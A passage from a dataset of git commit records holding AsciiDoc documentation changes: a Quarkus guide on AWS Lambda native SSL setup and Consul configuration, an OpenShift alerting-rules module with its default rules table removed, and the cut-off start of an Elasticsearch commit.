SqsClient.builder().region(Region.XXXX).httpClient(software.amazon.awssdk.http.urlconnection.UrlConnectionHttpClient.builder().build()).build();\n----\n\nFor Maven, add the following to your `pom.xml`.\n\n[source,xml]\n----\n\n <properties>\n <aws.sdk2.version>2.10.69<\/aws.sdk2.version>\n <\/properties>\n\n <dependencyManagement>\n <dependencies>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>bom<\/artifactId>\n <version>${aws.sdk2.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n\n <\/dependencies>\n <\/dependencyManagement>\n <dependencies>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>url-connection-client<\/artifactId>\n <\/dependency>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>apache-client<\/artifactId>\n <exclusions>\n <exclusion>\n <groupId>commons-logging<\/groupId>\n <artifactId>commons-logging<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <!-- sqs\/sns\/s3 etc -->\n <artifactId>sqs<\/artifactId>\n <exclusions>\n <!-- exclude the apache-client and netty client -->\n <exclusion>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>apache-client<\/artifactId>\n <\/exclusion>\n <exclusion>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>netty-nio-client<\/artifactId>\n <\/exclusion>\n <exclusion>\n <groupId>commons-logging<\/groupId>\n <artifactId>commons-logging<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n\n <dependency>\n <groupId>org.jboss.logging<\/groupId>\n <artifactId>commons-logging-jboss-logging<\/artifactId>\n <version>1.0.0.Final<\/version>\n <\/dependency>\n <\/dependencies>\n----\n\nNOTE: if you see `java.security.InvalidAlgorithmParameterException: the trustAnchors parameter must be non-empty` or similar SSL error, due to the current status of GraalVM,\nthere is some additional work to bundle the `function.zip`, as below. For more information, please see the link:native-and-ssl[Quarkus Native SSL Guide].\n\n== Additional requirements for client SSL\n\nThe native executable requires some additional steps to enable client ssl that S3 and other aws libraries need.\n\n1. A custom `bootstrap` script\n2. `libsunec.so` must be added to `function.zip`\n3. `cacerts` must be added to `function.zip`\n\nTo do this, first create a directory `src\/main\/zip.native\/` with your build. Next create a shell script file called `bootstrap`\nwithin `src\/main\/zip.native\/`, like below. An example is create automatically in your build folder (target or build), called `bootstrap-example.sh`\n\n[source,bash]\n----\n#!\/usr\/bin\/env bash\n\n.\/runner -Djava.library.path=.\/ -Djavax.net.ssl.trustStore=.\/cacerts\n----\n\nAdditional set `-Djavax.net.ssl.trustStorePassword=changeit` if your `cacerts` file is password protected.\n\nNext you must copy some files from your GraalVM distribution into `src\/main\/zip.native\/`.\n\nNOTE: GraalVM versions can have different paths for these files, and whether you using the Java 8 or 11 version. Adjust accordingly.\n\n[source,bash]\n----\ncp $GRAALVM_HOME\/lib\/libsunec.so $PROJECT_DIR\/src\/main\/zip.native\/\ncp $GRAALVM_HOME\/lib\/security\/cacerts $PROJECT_DIR\/src\/main\/zip.native\/\n----\n\nNow when you run the native build all these files will be included within `function.zip`\n\nNOTE: If you are using a Docker image to build, then you must extract these files from this image.\n\nTo extract the required ssl, you must start up a Docker container in the background, and attach to that container to copy the artifacts.\n\nFirst, let's start the GraalVM container, noting the container id output.\n[source,bash,subs=attributes+]\n----\ndocker run -it -d --entrypoint bash quay.io\/quarkus\/ubi-quarkus-native-image:{graalvm-flavor}\n\n# This will output a container id, like 6304eea6179522aff69acb38eca90bedfd4b970a5475aa37ccda3585bc2abdde\n# Note this value as we will need it for the commands below\n----\n\nFirst, libsunec.so, the C library used for the SSL implementation:\n\n[source,bash]\n----\ndocker cp {container-id-from-above}:\/opt\/graalvm\/jre\/lib\/amd64\/libsunec.so src\/main\/zip.native\/\n----\n\nSecond, cacerts, the certificate store. You may need to periodically obtain an updated copy, also.\n[source,bash]\n----\ndocker cp {container-id-from-above}:\/opt\/graalvm\/jre\/lib\/security\/cacerts src\/main\/zip.native\/\n----\n\nYour final archive will look like this:\n[source,bash]\n----\njar tvf target\/function.zip\n\n bootstrap\n runner\n cacerts\n libsunec.so\n----\n\n== Amazon Alexa Integration\n\nTo use Alexa with Quarkus native, please add the following extension.\n\n[source,xml]\n----\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-amazon-alexa<\/artifactId>\n <\/dependency>\n----\n\nCreate your Alexa handler, as normal, by sub-classing the abstract `com.amazon.ask.SkillStreamHandler`, and add your request handler implementation.\n\nThat's all there is to it!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"50da055ae8e16bb8d83b13366635492ab329ebd1","subject":"Fix typos in the consul-config.adoc guide","message":"Fix typos in the consul-config.adoc guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/consul-config.adoc","new_file":"docs\/src\/main\/asciidoc\/consul-config.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Reading properties from Consul\n\ninclude::.\/attributes.adoc[]\n:extension-status: preview\n\nThis guide explains how your Quarkus application can read configuration properties at runtime from https:\/\/www.consul.io[Consul].\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 11+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven {maven-version}\n\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\n\n== Introduction\n\nConsul is a versatile system which among other things, provides a distributed Key-Value store that is used in many architectures as a source of configuration for services.\nThis Key-Value store is what the `quarkus-consul-config` extension interacts with in order to allow Quarkus applications to read runtime configuration properties from Consul.\n\n== Starting Consul\n\nThere are various ways to start Consul that vary in complexity, but for the purposes of this guide, we elect to start a single Consul server with no persistence via Docker, like so:\n\n[source,bash]\n----\ndocker run --rm --name consul -p 8500:8500 -p 8501:8501 consul:1.7 agent -dev -ui -client=0.0.0.0 -bind=0.0.0.0 --https-port=8501\n----\n\nPlease consult the https:\/\/www.consul.io\/docs\/install[documentation] to learn more about the various Consul installation options.\n\n== Creating the Maven project\n\nFirst, we need a new project. Create a new project with the following command:\n\n[source,bash,subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=consul-config-quickstart \\\n -DclassName=\"org.acme.consul.config.GreetingResource\" \\\n -Dpath=\"\/greeting\" \\\n -Dextensions=\"consul-config\"\ncd consul-config-quickstart\n----\n\nThis command generates a Maven project with a REST endpoint and imports the `consul-config` extension.\n\nIf you already have your Quarkus project configured, you can add the `consul-config` extension\nto your project by running the following command in your project base directory:\n\n[source,bash]\n----\n.\/mvnw quarkus:add-extension -Dextensions=\"consul-config\"\n----\n\nThis will add the following to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-consul-config<\/artifactId>\n<\/dependency>\n----\n\n== GreetingController\n\nThe Quarkus Maven plugin automatically generated a `GreetingResource` JAX-RS resource in the\n`src\/main\/java\/org\/acme\/consul\/config\/client\/GreetingResource.java` file that looks like:\n\n[source,java]\n----\npackage org.acme.consul.config.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/greeting\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nAs we want to use configuration properties obtained from the Config Server, we will update the `GreetingResource` to inject the `message` property. The updated code will look like this:\n\n[source,java]\n----\npackage org.acme.consul.config.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\n@Path(\"\/greeting\")\npublic class GreetingResource {\n\n @ConfigProperty(name = \"greeting.message\", defaultValue=\"Hello from default\")\n String message;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return message;\n }\n}\n----\n\n== Configuring the application\n\nQuarkus provides various configuration knobs under the `quarkus.consul-config` root. For the purposes of this guide, our Quarkus application is going to be configured in `application.properties` as follows:\n\n[source,properties]\n----\n# use the same name as the application name that was configured when standing up the Config Server\nquarkus.application.name=consul-test\n# enable retrieval of configuration from Consul - this is off by default\nquarkus.consul-config.enabled=true\n# this is a key in Consul's KV store that the Quarkus application will read and try to extract properties from\nquarkus.consul-config.properties-value-keys=config\/${quarkus.application.name}\n----\n\n== Add Configuration to Consul\n\nFor the previous application configuration to work, we need to add a `config\/consul-test` key under Consul's Key Value store. The value of this key will essentially be a properties \"file\" containing the application configuration.\nIn this case we want to add the following data to the `config\/consul-test` key:\n\n[source,properties]\n----\ngreeting.message=Hello from Consul\n----\n\nWhen adding this configuration from the UI, Consul will automatically convert the data into the necessary base64 encoding. If you instead add the configuration via the Consul's https:\/\/www.consul.io\/api\/kv.html#create-update-key[REST API],\nmake sure to first encode the previous data into base64.\n\nNOTE: In this use case we made the value of the key as a properties \"file\", because we used `quarkus.consul-config.properties-value-keys` in the application. The\nextension also provides the ability to use the raw values of keys when `quarkus.consul-config.raw-value-keys` is used. Furthermore, these two properties can be used\nsimultaneously, while each one also supports setting multiple keys.\n\n== Package and run the application\n\nRun the application with: `.\/mvnw compile quarkus:dev`.\nOpen your browser to http:\/\/localhost:8080\/greeting.\n\nThe result should be: `Hello from Consul` as it is the value obtained from the Consul Key Value store.\n\n== Run the application as a native executable\n\nYou can of course create a native image using the instructions of the link:building-native-image[Building a native executable guide].\n\n== Configuration Reference\n\ninclude::{generated-dir}\/config\/quarkus-consul-config.adoc[opts=optional, leveloffset=+1]\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Reading properties from Consul\n\ninclude::.\/attributes.adoc[]\n:extension-status: preview\n\nThis guide explains how your Quarkus application can read configuration properties at runtime from https:\/\/www.consul.io[Consul].\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 11+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven {maven-version}\n\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\n\n== Introduction\n\nConsul is a versatile system which among other things, provides a distributed Key-Value store that is used in many architectures as a source of configuration for services.\nThis Key-Value store is what the `quarkus-consul-config` extension interacts with in order to allow Quarkus applications to read runtime configuration properties from Consul.\n\n== Starting Consul\n\nThere are various ways to start Consul that vary in complexity, but for the purposes of this guide, we elect to start a single Consul server with no persistence via Docker, like so:\n\n[source,bash]\n----\ndocker run --rm --name consul -p 8500:8500 -p 8501:8501 consul:1.7 agent -dev -ui -client=0.0.0.0 -bind=0.0.0.0 --https-port=8501\n----\n\nPlease consult the https:\/\/www.consul.io\/docs\/install[documentation] to learn more about the various Consul installation options.\n\n== Creating the Maven project\n\nFirst, we need a new project. Create a new project with the following command:\n\n[source,bash,subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=consul-config-quickstart \\\n -DclassName=\"org.acme.consul.config.GreetingResource\" \\\n -Dpath=\"\/greeting\" \\\n -Dextensions=\"consul-config\"\ncd consul-config-quickstart\n----\n\nThis command generates a Maven project with a REST endpoint and imports the `consul-config` extension.\n\nIf you already have your Quarkus project configured, you can add the `consul-config` extension\nto your project by running the following command in your project base directory:\n\n[source,bash]\n----\n.\/mvnw quarkus:add-extension -Dextensions=\"consul-config\"\n----\n\nThis will add the following to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-consul-config<\/artifactId>\n<\/dependency>\n----\n\n== GreetingController\n\nThe Quarkus Maven plugin automatically generated a `GreetingResource` JAX-RS resource in the\n`src\/main\/java\/org\/acme\/consul\/config\/client\/GreetingResource.java` file that looks like:\n\n[source,java]\n----\npackage org.acme.consul.config.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nAs we want to use configuration properties obtained from the Config Server, we will update the `GreetingResource` to inject the `message` property. The updated code will look like this:\n\n[source,java]\n----\npackage org.acme.consul.config.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @ConfigProperty(name = \"message\", defaultValue=\"Hello from default\")\n String message;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return message;\n }\n}\n----\n\n== Configuring the application\n\nQuarkus provides various configuration knobs under the `quarkus.consul-config` root. For the purposes of this guide, our Quarkus application is going to be configured in `application.properties` as follows:\n\n[source,properties]\n----\n# use the same name as the application name that was configured when standing up the Config Server\nquarkus.application.name=consul-test\n# enable retrieval of configuration from Consul - this is off by default\nquarkus.consul-config.enabled=true\n# this is a key in Consul's KV store that the Quarkus application will read and try to extract properties from\nquarkus.consul-config.properties-value-keys=config\/${quarkus.application.name}\n----\n\n== Add Configuration to Consul\n\nFor the previous application configuration to work, we need to add a `config\/consul-test` key under Consul's Key Value store. The value of this key will essentially be a properties \"file\" containing the application configuration.\nIn this case we want to add the following data to the `config\/consul-test` key:\n\n[source,properties]\n----\ngreeting.message=Hello from Consul\n----\n\nWhen adding this configuration from the UI, Consul will automatically convert the data into the necessary base64 encoding. If you instead add the configuration via the Consul's https:\/\/www.consul.io\/api\/kv.html#create-update-key[REST API],\nmake sure to first encode the previous data into base64.\n\nNOTE: In this use case we made the value of the key as a properties \"file\", because we used `quarkus.consul-config.properties-value-keys` in the application. The\nextension also provides the ability to use the raw values of keys when `quarkus.consul-config.raw-value-keys` is used. Furthermore, these two properties can be used\nsimultaneously, while each one also supports setting multiple keys.\n\n== Package and run the application\n\nRun the application with: `.\/mvnw compile quarkus:dev`.\nOpen your browser to http:\/\/localhost:8080\/greeting.\n\nThe result should be: `Hello from Consul` as it is the value obtained from the Consul Key Value store.\n\n== Run the application as a native executable\n\nYou can of course create a native image using the instructions of the link:building-native-image[Building a native executable guide].\n\n== Configuration Reference\n\ninclude::{generated-dir}\/config\/quarkus-consul-config.adoc[opts=optional, leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4b200dc0cc68f42cab066f105f0238757ef5d2f","subject":"Delete the default alerting rules table","message":"Delete the default alerting rules table\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/monitoring-alerting-rules.adoc","new_file":"modules\/monitoring-alerting-rules.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * monitoring\/configuring-monitoring-stack.adoc\n\n[id=\"alerting-rules-{context}\"]\n== Alerting rules\n\n{product-title} Cluster Monitoring by default ships with alerting rules defined in the link:https:\/\/github.com\/openshift\/cluster-monitoring-operator\/blob\/master\/assets\/prometheus-k8s\/rules.yaml[rules configuration file]. #FIXME what's the correct file?#\n\nNote that:\n\n* Currently you cannot add custom alerting rules.\n* Some alerting rules have identical names. This is intentional. They are alerting about the same event with different thresholds, with different severity, or both.\n* With the inhibition rules, the lower severity is inhibited when the higher severity is firing.\n* #FIXME anything else to mention?#\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * monitoring\/configuring-monitoring-stack.adoc\n\n[id=\"alerting-rules-{context}\"]\n== Alerting rules\n\n{product-title} Cluster Monitoring ships with the following alerting rules configured by default. Currently you cannot add custom alerting rules.\n\nSome alerting rules have identical names. This is intentional. They are alerting about the same event with different thresholds, with different severity, or both. With the inhibition rules, the lower severity is inhibited when the higher severity is firing.\n\nFor more details on the alerting rules, see the link:https:\/\/github.com\/openshift\/cluster-monitoring-operator\/blob\/master\/assets\/prometheus-k8s\/rules.yaml[configuration file].\n\n[options=\"header\"]\n|===\n|Alert|Severity|Description\n|`ClusterMonitoringOperatorErrors`|`critical`|Cluster Monitoring Operator is experiencing _X_% errors.\n|`AlertmanagerDown`|`critical`|Alertmanager has disappeared from Prometheus target discovery.\n|`ClusterMonitoringOperatorDown`|`critical`|ClusterMonitoringOperator has disappeared from Prometheus target discovery.\n|`KubeAPIDown`|`critical`|KubeAPI has disappeared from Prometheus target discovery.\n|`KubeControllerManagerDown`|`critical`|KubeControllerManager has disappeared from Prometheus target discovery.\n|`KubeSchedulerDown`|`critical`|KubeScheduler has disappeared from Prometheus target discovery.\n|`KubeStateMetricsDown`|`critical`|KubeStateMetrics has disappeared from Prometheus target discovery.\n|`KubeletDown`|`critical`|Kubelet has disappeared from Prometheus target discovery.\n|`NodeExporterDown`|`critical`|NodeExporter has disappeared from Prometheus target discovery.\n|`PrometheusDown`|`critical`|Prometheus has disappeared from Prometheus target discovery.\n|`PrometheusOperatorDown`|`critical`|PrometheusOperator has disappeared from Prometheus target discovery.\n|`KubePodCrashLooping`|`critical`|_Namespace\/Pod_ (_Container_) is restarting _times_ \/ second\n|`KubePodNotReady`|`critical`|_Namespace\/Pod_ is not ready.\n|`KubeDeploymentGenerationMismatch`|`critical`|Deployment _Namespace\/Deployment_ generation mismatch\n|`KubeDeploymentReplicasMismatch`|`critical`|Deployment _Namespace\/Deployment_ replica mismatch\n|`KubeStatefulSetReplicasMismatch`|`critical`|StatefulSet _Namespace\/StatefulSet_ replica mismatch\n|`KubeStatefulSetGenerationMismatch`|`critical`|StatefulSet _Namespace\/StatefulSet_ generation mismatch\n|`KubeDaemonSetRolloutStuck`|`critical`|Only _X_% of desired pods scheduled and ready for daemon set _Namespace\/DaemonSet_\n|`KubeDaemonSetNotScheduled`|`warning`|A number of pods of daemonset _Namespace\/DaemonSet_ are not scheduled.\n|`KubeDaemonSetMisScheduled`|`warning`|A number of pods of daemonset _Namespace\/DaemonSet_ are running where they are not supposed to run.\n|`KubeCronJobRunning`|`warning`|CronJob _Namespace\/CronJob_ is taking more than 1h to complete.\n|`KubeJobCompletion`|`warning`|Job _Namespaces\/Job_ is taking more than 1h to complete.\n|`KubeJobFailed`|`warning`|Job _Namespaces\/Job_ failed to complete.\n|`KubeCPUOvercommit`|`warning`|Overcommited CPU resource requests on Pods, cannot tolerate node failure.\n|`KubeMemOvercommit`|`warning`|Overcommited Memory resource requests on Pods, cannot tolerate node failure.\n|`KubeCPUOvercommit`|`warning`|Overcommited CPU resource request quota on Namespaces.\n|`KubeMemOvercommit`|`warning`|Overcommited Memory resource request quota on Namespaces.\n|`alerKubeQuotaExceeded`|`warning`|_X_% usage of _Resource_ in namespace _Namespace_.\n|`KubePersistentVolumeUsageCritical`|`critical`|The persistent volume claimed by _PersistentVolumeClaim_ in namespace _Namespace_ has _X_% free.\n|`KubePersistentVolumeFullInFourDays`|`critical`|Based on recent sampling, the persistent volume claimed by _PersistentVolumeClaim_ in namespace _Namespace_ is expected to fill up within four days. Currently _X_ bytes are available.\n|`KubeNodeNotReady`|`warning`|_Node_ has been unready for more than an hour\n|`KubeVersionMismatch`|`warning`|There are _X_ different versions of Kubernetes components running.\n|`KubeClientErrors`|`warning`|Kubernetes API server client '_Job\/Instance_' is experiencing _X_% errors.'\n|`KubeClientErrors`|`warning`|Kubernetes API server client '_Job\/Instance_' is experiencing _X_ errors \/ sec.'\n|`KubeletTooManyPods`|`warning`|Kubelet _Instance_ is running _X_ pods, close to the limit of 110.\n|`KubeAPILatencyHigh`|`warning`|The API server has a 99th percentile latency of _X_ seconds for _Verb_ _Resource_.\n|`KubeAPILatencyHigh`|`critical`|The API server has a 99th percentile latency of _X_ seconds for _Verb_ _Resource_.\n|`KubeAPIErrorsHigh`|`critical`|API server is erroring for _X_% of requests.\n|`KubeAPIErrorsHigh`|`warning`|API server is erroring for _X_% of requests.\n|`KubeClientCertificateExpiration`|`warning`|Kubernetes API certificate is expiring in less than 7 days.\n|`KubeClientCertificateExpiration`|`critical`|Kubernetes API certificate is expiring in less than 1 day.\n|`AlertmanagerConfigInconsistent`|`critical`|Summary: Configuration out of sync. Description: The configuration of the instances of the Alertmanager cluster `_Service_` are out of sync.\n|`AlertmanagerFailedReload`|`warning`|Summary: Alertmanager's configuration reload failed. Description: Reloading Alertmanager's configuration has failed for _Namespace\/Pod_.\n|`TargetDown`|`warning`|Summary: Targets are down. Description: _X_% of _Job_ targets are down.\n|`DeadMansSwitch`|`none`|Summary: Alerting DeadMansSwitch. Description: This is a DeadMansSwitch meant to ensure that the entire Alerting pipeline is functional.\n|`NodeDiskRunningFull`|`warning`|Device _Device_ of node-exporter _Namespace\/Pod_ is running full within the next 24 hours.\n|`NodeDiskRunningFull`|`critical`|Device _Device_ of node-exporter _Namespace\/Pod_ is running full within the next 2 hours.\n|`PrometheusConfigReloadFailed`|`warning`|Summary: Reloading Prometheus' configuration failed. Description: Reloading Prometheus' configuration has failed for _Namespace\/Pod_\n|`PrometheusNotificationQueueRunningFull`|`warning`|Summary: Prometheus' alert notification queue is running full. Description: Prometheus' alert notification queue is running full for _Namespace\/Pod_\n|`PrometheusErrorSendingAlerts`|`warning`|Summary: Errors while sending alert from Prometheus. Description: Errors while sending alerts from Prometheus _Namespace\/Pod_ to Alertmanager _Alertmanager_\n|`PrometheusErrorSendingAlerts`|`critical`|Summary: Errors while sending alerts from Prometheus. Description: Errors while sending alerts from Prometheus _Namespace\/Pod_ to Alertmanager _Alertmanager_\n|`PrometheusNotConnectedToAlertmanagers`|`warning`|Summary: Prometheus is not connected to any Alertmanagers. Description: Prometheus _Namespace\/Pod_ is not connected to any Alertmanagers\n|`PrometheusTSDBReloadsFailing`|`warning`|Summary: Prometheus has issues reloading data blocks from disk. Description: _Job_ at _Instance_ had _X_ reload failures over the last four hours.\n|`PrometheusTSDBCompactionsFailing`|`warning`|Summary: Prometheus has issues compacting sample blocks. Description: _Job_ at _Instance_ had _X_ compaction failures over the last four hours.\n|`PrometheusTSDBWALCorruptions`|`warning`|Summary: Prometheus write-ahead log is corrupted. Description: _Job_ at _Instance_ has a corrupted write-ahead log (WAL).\n|`PrometheusNotIngestingSamples`|`warning`|Summary: Prometheus isn't ingesting samples. Description: Prometheus _Namespace\/Pod_ isn't ingesting samples.\n|`PrometheusTargetScrapesDuplicate`|`warning`|Summary: Prometheus has many samples rejected. Description: _Namespace\/Pod_ has many samples rejected due to duplicate timestamps but different values\n|`EtcdInsufficientMembers`|`critical`|Etcd cluster \"_Job_\": insufficient members (_X_).\n|`EtcdNoLeader`|`critical`|Etcd cluster \"_Job_\": member _Instance_ has no leader.\n|`EtcdHighNumberOfLeaderChanges`|`warning`|Etcd cluster \"_Job_\": instance _Instance_ has seen _X_ leader changes within the last hour.\n|`EtcdHighNumberOfFailedGRPCRequests`|`warning`|Etcd cluster \"_Job_\": _X_% of requests for _GRPC_Method_ failed on etcd instance _Instance_.\n|`EtcdHighNumberOfFailedGRPCRequests`|`critical`|Etcd cluster \"_Job_\": _X_% of requests for _GRPC_Method_ failed on etcd instance _Instance_.\n|`EtcdGRPCRequestsSlow`|`critical`|Etcd cluster \"_Job_\": gRPC requests to _GRPC_Method_ are taking _X_s on etcd instance _Instance_.\n|`EtcdMemberCommunicationSlow`|`warning`|Etcd cluster \"_Job_\": member communication with _To_ is taking _X_s on etcd instance _Instance_.\n|`EtcdHighNumberOfFailedProposals`|`warning`|Etcd cluster \"_Job_\": _X_ proposal failures within the last hour on etcd instance _Instance_.\n|`EtcdHighFsyncDurations`|`warning`|Etcd cluster \"_Job_\": 99th percentile fync durations are _X_s on etcd instance _Instance_.\n|`EtcdHighCommitDurations`|`warning`|Etcd cluster \"_Job_\": 99th percentile commit durations _X_s on etcd instance _Instance_.\n|`FdExhaustionClose`|`warning`|_Job_ instance _Instance_ will exhaust its file descriptors soon\n|`FdExhaustionClose`|`critical`|_Job_ instance _Instance_ will exhaust its file descriptors soon\n|===\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"86b3ff229ca484ffe891e0512b8bea0d1bcfb23c","subject":"Add new ruby search library to community clients doc (#22765)","message":"Add new ruby search library to community clients doc (#22765)\n\n* Add new Ruby search lib from Artsy.\r\n\r\n* update ruby library reference following rename\r\n","repos":"jimczi\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,bawse\/elasticsearch,glefloch\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,Stacey-Gammon\/elasticsearch,C-Bish\/elasticsearch,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,artnowo\/elasticsearch,sneivandt\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,Helen-Zhao\/elasticsearch,C-Bish\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,geidies\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nilabhsagar\/elasticsearch,njlawton\/elasticsearch,glefloch\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,fred84\/elasticsearch,i-am-Nathan\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,Helen-Zhao\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,fernandozhu\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,Shepard1212\/elasticsearch,JSCooke\/elasticsearch,uschindler\/elasticsearch,rlugojr\/elasticsearch,strapdata\/elassandra,njlawton\/elasticsearch,StefanGor\/elasticsearch,MisterAndersen\/elasticsearch,vroyer\/elassandra,bawse\/elasticsearch,mortonsykes\/elasticsearch,fernandozhu\/elasticsearch,qwerty4030\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,obourgain\/elasticsearch,alexshadow007\/elasticsearch,StefanGor\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rlugojr\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,mikemccand\/elasticsearch,rlugojr\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,artnowo\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,nezirus\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,winstonewert\/elasticsearch,jprante\/elasticsearch,JackyMai\/elasticsearch,Shepard1212\/elasticsearch,brandonkearby\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,njlawton\/elasticsearch,geidies\/elasticsearch,alexshadow007\/elasticsearch,wangtuo\/elasticsearch,nazarewk\/elasticsearch,markwalkom\/elasticsearch,IanvsPoplicola\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,alexshadow007\/elasticsearch,mortonsykes\/elasticsearch,Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch,maddin2016\/elasticsearch,StefanGor\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,nilabhsagar\/elasticsearch,Shepard1212\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,brandonkearby\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,nazarewk\/elasticsearch,nezirus\/elasticsearch,Shepard1212\/elasticsearch,gingerwizard\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,Helen-Zhao\/elasticsearch,scottsom\/elasticsearch,coding0011\/elasticsearch,JackyMai\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra,maddin2016\/elasticsearch,rlugojr\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,brandonkearby\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,g